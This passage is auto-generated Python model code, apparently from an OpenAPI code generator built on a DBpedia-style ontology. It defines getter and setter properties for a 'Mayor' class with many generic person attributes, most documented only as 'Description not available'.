Description not available # noqa: E501
:param notable_idea: The notable_idea of this Mayor. # noqa: E501
:type: list[object]
"""
self._notable_idea = notable_idea
@property
def player_status(self):
"""Gets the player_status of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The player_status of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._player_status
@player_status.setter
def player_status(self, player_status):
"""Sets the player_status of this Mayor.
Description not available # noqa: E501
:param player_status: The player_status of this Mayor. # noqa: E501
:type: list[str]
"""
self._player_status = player_status
@property
def other_function(self):
"""Gets the other_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The other_function of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._other_function
@other_function.setter
def other_function(self, other_function):
"""Sets the other_function of this Mayor.
Description not available # noqa: E501
:param other_function: The other_function of this Mayor. # noqa: E501
:type: list[object]
"""
self._other_function = other_function
@property
def continental_tournament_silver(self):
"""Gets the continental_tournament_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The continental_tournament_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._continental_tournament_silver
@continental_tournament_silver.setter
def continental_tournament_silver(self, continental_tournament_silver):
"""Sets the continental_tournament_silver of this Mayor.
Description not available # noqa: E501
:param continental_tournament_silver: The continental_tournament_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._continental_tournament_silver = continental_tournament_silver
@property
def career_station(self):
"""Gets the career_station of this Mayor. # noqa: E501
this property links to a step in the career of a person, e.g. a soccer player, holding information on the time span, matches and goals he or she achieved at a club. # noqa: E501
:return: The career_station of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._career_station
@career_station.setter
def career_station(self, career_station):
"""Sets the career_station of this Mayor.
this property links to a step in the career of a person, e.g. a soccer player, holding information on the time span, matches and goals he or she achieved at a club. # noqa: E501
:param career_station: The career_station of this Mayor. # noqa: E501
:type: list[object]
"""
self._career_station = career_station
@property
def resting_place_position(self):
"""Gets the resting_place_position of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The resting_place_position of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._resting_place_position
@resting_place_position.setter
def resting_place_position(self, resting_place_position):
"""Sets the resting_place_position of this Mayor.
Description not available # noqa: E501
:param resting_place_position: The resting_place_position of this Mayor. # noqa: E501
:type: list[object]
"""
self._resting_place_position = resting_place_position
@property
def original_danse_competition(self):
"""Gets the original_danse_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The original_danse_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._original_danse_competition
@original_danse_competition.setter
def original_danse_competition(self, original_danse_competition):
"""Sets the original_danse_competition of this Mayor.
Description not available # noqa: E501
:param original_danse_competition: The original_danse_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._original_danse_competition = original_danse_competition
@property
def status_manager(self):
"""Gets the status_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The status_manager of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._status_manager
@status_manager.setter
def status_manager(self, status_manager):
"""Sets the status_manager of this Mayor.
Description not available # noqa: E501
:param status_manager: The status_manager of this Mayor. # noqa: E501
:type: list[str]
"""
self._status_manager = status_manager
@property
def national_tournament(self):
"""Gets the national_tournament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._national_tournament
@national_tournament.setter
def national_tournament(self, national_tournament):
"""Sets the national_tournament of this Mayor.
Description not available # noqa: E501
:param national_tournament: The national_tournament of this Mayor. # noqa: E501
:type: list[object]
"""
self._national_tournament = national_tournament
@property
def hometown(self):
"""Gets the hometown of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hometown of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._hometown
@hometown.setter
def hometown(self, hometown):
"""Sets the hometown of this Mayor.
Description not available # noqa: E501
:param hometown: The hometown of this Mayor. # noqa: E501
:type: list[object]
"""
self._hometown = hometown
@property
def dead_in_fight_place(self):
"""Gets the dead_in_fight_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The dead_in_fight_place of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._dead_in_fight_place
@dead_in_fight_place.setter
def dead_in_fight_place(self, dead_in_fight_place):
"""Sets the dead_in_fight_place of this Mayor.
Description not available # noqa: E501
:param dead_in_fight_place: The dead_in_fight_place of this Mayor. # noqa: E501
:type: list[str]
"""
self._dead_in_fight_place = dead_in_fight_place
@property
def continental_tournament_bronze(self):
"""Gets the continental_tournament_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The continental_tournament_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._continental_tournament_bronze
@continental_tournament_bronze.setter
def continental_tournament_bronze(self, continental_tournament_bronze):
"""Sets the continental_tournament_bronze of this Mayor.
Description not available # noqa: E501
:param continental_tournament_bronze: The continental_tournament_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._continental_tournament_bronze = continental_tournament_bronze
@property
def victory(self):
"""Gets the victory of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The victory of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._victory
@victory.setter
def victory(self, victory):
"""Sets the victory of this Mayor.
Description not available # noqa: E501
:param victory: The victory of this Mayor. # noqa: E501
:type: list[int]
"""
self._victory = victory
@property
def complexion(self):
"""Gets the complexion of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The complexion of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._complexion
@complexion.setter
def complexion(self, complexion):
"""Sets the complexion of this Mayor.
Description not available # noqa: E501
:param complexion: The complexion of this Mayor. # noqa: E501
:type: list[object]
"""
self._complexion = complexion
@property
def citizenship(self):
"""Gets the citizenship of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The citizenship of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._citizenship
@citizenship.setter
def citizenship(self, citizenship):
"""Sets the citizenship of this Mayor.
Description not available # noqa: E501
:param citizenship: The citizenship of this Mayor. # noqa: E501
:type: list[object]
"""
self._citizenship = citizenship
@property
def start(self):
"""Gets the start of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._start
@start.setter
def start(self, start):
"""Sets the start of this Mayor.
Description not available # noqa: E501
:param start: The start of this Mayor. # noqa: E501
:type: list[int]
"""
self._start = start
@property
def tessitura(self):
"""Gets the tessitura of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The tessitura of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._tessitura
@tessitura.setter
def tessitura(self, tessitura):
"""Sets the tessitura of this Mayor.
Description not available # noqa: E501
:param tessitura: The tessitura of this Mayor. # noqa: E501
:type: list[str]
"""
self._tessitura = tessitura
@property
def start_career(self):
"""Gets the start_career of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start_career of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._start_career
@start_career.setter
def start_career(self, start_career):
"""Sets the start_career of this Mayor.
Description not available # noqa: E501
:param start_career: The start_career of this Mayor. # noqa: E501
:type: list[str]
"""
self._start_career = start_career
@property
def label(self):
"""Gets the label of this Mayor. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Mayor.
short description of the resource # noqa: E501
:param label: The label of this Mayor. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def birth_date(self):
"""Gets the birth_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._birth_date
@birth_date.setter
def birth_date(self, birth_date):
"""Sets the birth_date of this Mayor.
Description not available # noqa: E501
:param birth_date: The birth_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._birth_date = birth_date
@property
def national_tournament_silver(self):
"""Gets the national_tournament_silver of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament_silver of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._national_tournament_silver
@national_tournament_silver.setter
def national_tournament_silver(self, national_tournament_silver):
"""Sets the national_tournament_silver of this Mayor.
Description not available # noqa: E501
:param national_tournament_silver: The national_tournament_silver of this Mayor. # noqa: E501
:type: list[int]
"""
self._national_tournament_silver = national_tournament_silver
@property
def other_activity(self):
"""Gets the other_activity of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The other_activity of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._other_activity
@other_activity.setter
def other_activity(self, other_activity):
"""Sets the other_activity of this Mayor.
Description not available # noqa: E501
:param other_activity: The other_activity of this Mayor. # noqa: E501
:type: list[str]
"""
self._other_activity = other_activity
@property
def linguistics_tradition(self):
"""Gets the linguistics_tradition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The linguistics_tradition of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._linguistics_tradition
@linguistics_tradition.setter
def linguistics_tradition(self, linguistics_tradition):
"""Sets the linguistics_tradition of this Mayor.
Description not available # noqa: E501
:param linguistics_tradition: The linguistics_tradition of this Mayor. # noqa: E501
:type: list[object]
"""
self._linguistics_tradition = linguistics_tradition
@property
def national_tournament_bronze(self):
"""Gets the national_tournament_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_tournament_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._national_tournament_bronze
@national_tournament_bronze.setter
def national_tournament_bronze(self, national_tournament_bronze):
"""Sets the national_tournament_bronze of this Mayor.
Description not available # noqa: E501
:param national_tournament_bronze: The national_tournament_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._national_tournament_bronze = national_tournament_bronze
@property
def escalafon(self):
"""Gets the escalafon of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The escalafon of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._escalafon
@escalafon.setter
def escalafon(self, escalafon):
"""Sets the escalafon of this Mayor.
Description not available # noqa: E501
:param escalafon: The escalafon of this Mayor. # noqa: E501
:type: list[str]
"""
self._escalafon = escalafon
@property
def sibling(self):
"""Gets the sibling of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sibling of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._sibling
@sibling.setter
def sibling(self, sibling):
"""Sets the sibling of this Mayor.
Description not available # noqa: E501
:param sibling: The sibling of this Mayor. # noqa: E501
:type: list[object]
"""
self._sibling = sibling
@property
def waist_size(self):
"""Gets the waist_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The waist_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._waist_size
@waist_size.setter
def waist_size(self, waist_size):
"""Sets the waist_size of this Mayor.
Description not available # noqa: E501
:param waist_size: The waist_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._waist_size = waist_size
@property
def olympic_games_gold(self):
"""Gets the olympic_games_gold of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_gold of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_gold
@olympic_games_gold.setter
def olympic_games_gold(self, olympic_games_gold):
"""Sets the olympic_games_gold of this Mayor.
Description not available # noqa: E501
:param olympic_games_gold: The olympic_games_gold of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_gold = olympic_games_gold
@property
def general_council(self):
"""Gets the general_council of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The general_council of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._general_council
@general_council.setter
def general_council(self, general_council):
"""Sets the general_council of this Mayor.
Description not available # noqa: E501
:param general_council: The general_council of this Mayor. # noqa: E501
:type: list[object]
"""
self._general_council = general_council
@property
def arrest_date(self):
"""Gets the arrest_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The arrest_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._arrest_date
@arrest_date.setter
def arrest_date(self, arrest_date):
"""Sets the arrest_date of this Mayor.
Description not available # noqa: E501
:param arrest_date: The arrest_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._arrest_date = arrest_date
@property
def team_manager(self):
"""Gets the team_manager of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The team_manager of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._team_manager
@team_manager.setter
def team_manager(self, team_manager):
"""Sets the team_manager of this Mayor.
Description not available # noqa: E501
:param team_manager: The team_manager of this Mayor. # noqa: E501
:type: list[object]
"""
self._team_manager = team_manager
@property
def birth_sign(self):
"""Gets the birth_sign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The birth_sign of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._birth_sign
@birth_sign.setter
def birth_sign(self, birth_sign):
"""Sets the birth_sign of this Mayor.
Description not available # noqa: E501
:param birth_sign: The birth_sign of this Mayor. # noqa: E501
:type: list[object]
"""
self._birth_sign = birth_sign
@property
def artistic_function(self):
"""Gets the artistic_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The artistic_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._artistic_function
@artistic_function.setter
def artistic_function(self, artistic_function):
"""Sets the artistic_function of this Mayor.
Description not available # noqa: E501
:param artistic_function: The artistic_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._artistic_function = artistic_function
@property
def age(self):
"""Gets the age of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The age of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._age
@age.setter
def age(self, age):
"""Sets the age of this Mayor.
Description not available # noqa: E501
:param age: The age of this Mayor. # noqa: E501
:type: list[int]
"""
self._age = age
@property
def college(self):
"""Gets the college of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The college of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._college
@college.setter
def college(self, college):
"""Sets the college of this Mayor.
Description not available # noqa: E501
:param college: The college of this Mayor. # noqa: E501
:type: list[object]
"""
self._college = college
@property
def education(self):
"""Gets the education of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The education of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._education
@education.setter
def education(self, education):
"""Sets the education of this Mayor.
Description not available # noqa: E501
:param education: The education of this Mayor. # noqa: E501
:type: list[object]
"""
self._education = education
@property
def movie(self):
"""Gets the movie of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The movie of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._movie
@movie.setter
def movie(self, movie):
"""Sets the movie of this Mayor.
Description not available # noqa: E501
:param movie: The movie of this Mayor. # noqa: E501
:type: list[object]
"""
self._movie = movie
@property
def achievement(self):
"""Gets the achievement of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The achievement of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._achievement
@achievement.setter
def achievement(self, achievement):
"""Sets the achievement of this Mayor.
Description not available # noqa: E501
:param achievement: The achievement of this Mayor. # noqa: E501
:type: list[object]
"""
self._achievement = achievement
@property
def death_age(self):
"""Gets the death_age of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The death_age of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._death_age
@death_age.setter
def death_age(self, death_age):
"""Sets the death_age of this Mayor.
Description not available # noqa: E501
:param death_age: The death_age of this Mayor. # noqa: E501
:type: list[int]
"""
self._death_age = death_age
@property
def type(self):
"""Gets the type of this Mayor. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Mayor.
type of the resource # noqa: E501
:param type: The type of this Mayor. # noqa: E501
:type: list[str]
"""
self._type = type
@property
def approach(self):
"""Gets the approach of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The approach of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._approach
@approach.setter
def approach(self, approach):
"""Sets the approach of this Mayor.
Description not available # noqa: E501
:param approach: The approach of this Mayor. # noqa: E501
:type: list[object]
"""
self._approach = approach
@property
def relation(self):
"""Gets the relation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The relation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._relation
@relation.setter
def relation(self, relation):
"""Sets the relation of this Mayor.
Description not available # noqa: E501
:param relation: The relation of this Mayor. # noqa: E501
:type: list[object]
"""
self._relation = relation
@property
def victory_as_mgr(self):
"""Gets the victory_as_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The victory_as_mgr of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._victory_as_mgr
@victory_as_mgr.setter
def victory_as_mgr(self, victory_as_mgr):
"""Sets the victory_as_mgr of this Mayor.
Description not available # noqa: E501
:param victory_as_mgr: The victory_as_mgr of this Mayor. # noqa: E501
:type: list[int]
"""
self._victory_as_mgr = victory_as_mgr
@property
def living_place(self):
"""Gets the living_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The living_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._living_place
@living_place.setter
def living_place(self, living_place):
"""Sets the living_place of this Mayor.
Description not available # noqa: E501
:param living_place: The living_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._living_place = living_place
@property
def copilote(self):
"""Gets the copilote of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The copilote of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._copilote
@copilote.setter
def copilote(self, copilote):
"""Sets the copilote of this Mayor.
Description not available # noqa: E501
:param copilote: The copilote of this Mayor. # noqa: E501
:type: list[object]
"""
self._copilote = copilote
@property
def season(self):
"""Gets the season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._season
@season.setter
def season(self, season):
"""Sets the season of this Mayor.
Description not available # noqa: E501
:param season: The season of this Mayor. # noqa: E501
:type: list[object]
"""
self._season = season
@property
def start_wct(self):
"""Gets the start_wct of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start_wct of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._start_wct
@start_wct.setter
def start_wct(self, start_wct):
"""Sets the start_wct of this Mayor.
Description not available # noqa: E501
:param start_wct: The start_wct of this Mayor. # noqa: E501
:type: list[str]
"""
self._start_wct = start_wct
@property
def catch(self):
"""Gets the catch of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The catch of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._catch
@catch.setter
def catch(self, catch):
"""Sets the catch of this Mayor.
Description not available # noqa: E501
:param catch: The catch of this Mayor. # noqa: E501
:type: list[str]
"""
self._catch = catch
@property
def id(self):
"""Gets the id of this Mayor. # noqa: E501
identifier # noqa: E501
:return: The id of this Mayor. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Mayor.
identifier # noqa: E501
:param id: The id of this Mayor. # noqa: E501
:type: str
"""
self._id = id
@property
def feat(self):
"""Gets the feat of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The feat of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._feat
@feat.setter
def feat(self, feat):
"""Sets the feat of this Mayor.
Description not available # noqa: E501
:param feat: The feat of this Mayor. # noqa: E501
:type: list[str]
"""
self._feat = feat
@property
def decoration(self):
"""Gets the decoration of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The decoration of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._decoration
@decoration.setter
def decoration(self, decoration):
"""Sets the decoration of this Mayor.
Description not available # noqa: E501
:param decoration: The decoration of this Mayor. # noqa: E501
:type: list[object]
"""
self._decoration = decoration
@property
def case(self):
"""Gets the case of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The case of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._case
@case.setter
def case(self, case):
"""Sets the case of this Mayor.
Description not available # noqa: E501
:param case: The case of this Mayor. # noqa: E501
:type: list[str]
"""
self._case = case
@property
def sentence(self):
"""Gets the sentence of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The sentence of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._sentence
@sentence.setter
def sentence(self, sentence):
"""Sets the sentence of this Mayor.
Description not available # noqa: E501
:param sentence: The sentence of this Mayor. # noqa: E501
:type: list[str]
"""
self._sentence = sentence
@property
def profession(self):
"""Gets the profession of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The profession of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._profession
@profession.setter
def profession(self, profession):
"""Sets the profession of this Mayor.
Description not available # noqa: E501
:param profession: The profession of this Mayor. # noqa: E501
:type: list[object]
"""
self._profession = profession
@property
def retirement_date(self):
"""Gets the retirement_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The retirement_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._retirement_date
@retirement_date.setter
def retirement_date(self, retirement_date):
"""Sets the retirement_date of this Mayor.
Description not available # noqa: E501
:param retirement_date: The retirement_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._retirement_date = retirement_date
@property
def world_tournament(self):
"""Gets the world_tournament of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world_tournament of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._world_tournament
@world_tournament.setter
def world_tournament(self, world_tournament):
"""Sets the world_tournament of this Mayor.
Description not available # noqa: E501
:param world_tournament: The world_tournament of this Mayor. # noqa: E501
:type: list[object]
"""
self._world_tournament = world_tournament
@property
def wife(self):
"""Gets the wife of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The wife of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._wife
@wife.setter
def wife(self, wife):
"""Sets the wife of this Mayor.
Description not available # noqa: E501
:param wife: The wife of this Mayor. # noqa: E501
:type: list[object]
"""
self._wife = wife
@property
def allegiance(self):
"""Gets the allegiance of this Mayor. # noqa: E501
The country or other power the person served. Multiple countries may be indicated together with the corresponding dates. This field should not be used to indicate a particular service branch, which is better indicated by the branch field. # noqa: E501
:return: The allegiance of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._allegiance
@allegiance.setter
def allegiance(self, allegiance):
"""Sets the allegiance of this Mayor.
The country or other power the person served. Multiple countries may be indicated together with the corresponding dates. This field should not be used to indicate a particular service branch, which is better indicated by the branch field. # noqa: E501
:param allegiance: The allegiance of this Mayor. # noqa: E501
:type: list[str]
"""
self._allegiance = allegiance
@property
def active_years_start_date_mgr(self):
"""Gets the active_years_start_date_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_start_date_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_start_date_mgr
@active_years_start_date_mgr.setter
def active_years_start_date_mgr(self, active_years_start_date_mgr):
"""Sets the active_years_start_date_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_start_date_mgr: The active_years_start_date_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_start_date_mgr = active_years_start_date_mgr
@property
def lccn_id(self):
"""Gets the lccn_id of this Mayor. # noqa: E501
Library of Congress Control Number # noqa: E501
:return: The lccn_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._lccn_id
@lccn_id.setter
def lccn_id(self, lccn_id):
"""Sets the lccn_id of this Mayor.
Library of Congress Control Number # noqa: E501
:param lccn_id: The lccn_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._lccn_id = lccn_id
@property
def tattoo(self):
"""Gets the tattoo of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The tattoo of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._tattoo
@tattoo.setter
def tattoo(self, tattoo):
"""Sets the tattoo of this Mayor.
Description not available # noqa: E501
:param tattoo: The tattoo of this Mayor. # noqa: E501
:type: list[str]
"""
self._tattoo = tattoo
@property
def british_wins(self):
"""Gets the british_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The british_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._british_wins
@british_wins.setter
def british_wins(self, british_wins):
"""Sets the british_wins of this Mayor.
Description not available # noqa: E501
:param british_wins: The british_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._british_wins = british_wins
@property
def hip_size(self):
"""Gets the hip_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The hip_size of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._hip_size
@hip_size.setter
def hip_size(self, hip_size):
"""Sets the hip_size of this Mayor.
Description not available # noqa: E501
:param hip_size: The hip_size of this Mayor. # noqa: E501
:type: list[float]
"""
self._hip_size = hip_size
@property
def podium(self):
"""Gets the podium of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The podium of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._podium
@podium.setter
def podium(self, podium):
"""Sets the podium of this Mayor.
Description not available # noqa: E501
:param podium: The podium of this Mayor. # noqa: E501
:type: list[int]
"""
self._podium = podium
@property
def seiyu(self):
"""Gets the seiyu of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The seiyu of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._seiyu
@seiyu.setter
def seiyu(self, seiyu):
"""Sets the seiyu of this Mayor.
Description not available # noqa: E501
:param seiyu: The seiyu of this Mayor. # noqa: E501
:type: list[object]
"""
self._seiyu = seiyu
@property
def player_season(self):
"""Gets the player_season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The player_season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._player_season
@player_season.setter
def player_season(self, player_season):
"""Sets the player_season of this Mayor.
Description not available # noqa: E501
:param player_season: The player_season of this Mayor. # noqa: E501
:type: list[object]
"""
self._player_season = player_season
@property
def short_prog_score(self):
"""Gets the short_prog_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The short_prog_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._short_prog_score
@short_prog_score.setter
def short_prog_score(self, short_prog_score):
"""Sets the short_prog_score of this Mayor.
Description not available # noqa: E501
:param short_prog_score: The short_prog_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._short_prog_score = short_prog_score
@property
def regional_council(self):
"""Gets the regional_council of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The regional_council of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._regional_council
@regional_council.setter
def regional_council(self, regional_council):
"""Sets the regional_council of this Mayor.
Description not available # noqa: E501
:param regional_council: The regional_council of this Mayor. # noqa: E501
:type: list[object]
"""
self._regional_council = regional_council
@property
def homage(self):
"""Gets the homage of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The homage of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._homage
@homage.setter
def homage(self, homage):
"""Sets the homage of this Mayor.
Description not available # noqa: E501
:param homage: The homage of this Mayor. # noqa: E501
:type: list[str]
"""
self._homage = homage
@property
def shoe_size(self):
"""Gets the shoe_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The shoe_size of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._shoe_size
@shoe_size.setter
def shoe_size(self, shoe_size):
"""Sets the shoe_size of this Mayor.
Description not available # noqa: E501
:param shoe_size: The shoe_size of this Mayor. # noqa: E501
:type: list[str]
"""
self._shoe_size = shoe_size
@property
def signature(self):
"""Gets the signature of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The signature of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._signature
@signature.setter
def signature(self, signature):
"""Sets the signature of this Mayor.
Description not available # noqa: E501
:param signature: The signature of this Mayor. # noqa: E501
:type: list[str]
"""
self._signature = signature
@property
def olympic_games_bronze(self):
"""Gets the olympic_games_bronze of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The olympic_games_bronze of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._olympic_games_bronze
@olympic_games_bronze.setter
def olympic_games_bronze(self, olympic_games_bronze):
"""Sets the olympic_games_bronze of this Mayor.
Description not available # noqa: E501
:param olympic_games_bronze: The olympic_games_bronze of this Mayor. # noqa: E501
:type: list[int]
"""
self._olympic_games_bronze = olympic_games_bronze
@property
def danse_score(self):
"""Gets the danse_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The danse_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._danse_score
@danse_score.setter
def danse_score(self, danse_score):
"""Sets the danse_score of this Mayor.
Description not available # noqa: E501
:param danse_score: The danse_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._danse_score = danse_score
@property
def id_number(self):
"""Gets the id_number of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The id_number of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._id_number
@id_number.setter
def id_number(self, id_number):
"""Sets the id_number of this Mayor.
Description not available # noqa: E501
:param id_number: The id_number of this Mayor. # noqa: E501
:type: list[int]
"""
self._id_number = id_number
@property
def short_prog_competition(self):
"""Gets the short_prog_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The short_prog_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._short_prog_competition
@short_prog_competition.setter
def short_prog_competition(self, short_prog_competition):
"""Sets the short_prog_competition of this Mayor.
Description not available # noqa: E501
:param short_prog_competition: The short_prog_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._short_prog_competition = short_prog_competition
@property
def active_years_start_year_mgr(self):
"""Gets the active_years_start_year_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_start_year_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_start_year_mgr
@active_years_start_year_mgr.setter
def active_years_start_year_mgr(self, active_years_start_year_mgr):
"""Sets the active_years_start_year_mgr of this Mayor.
Description not available # noqa: E501
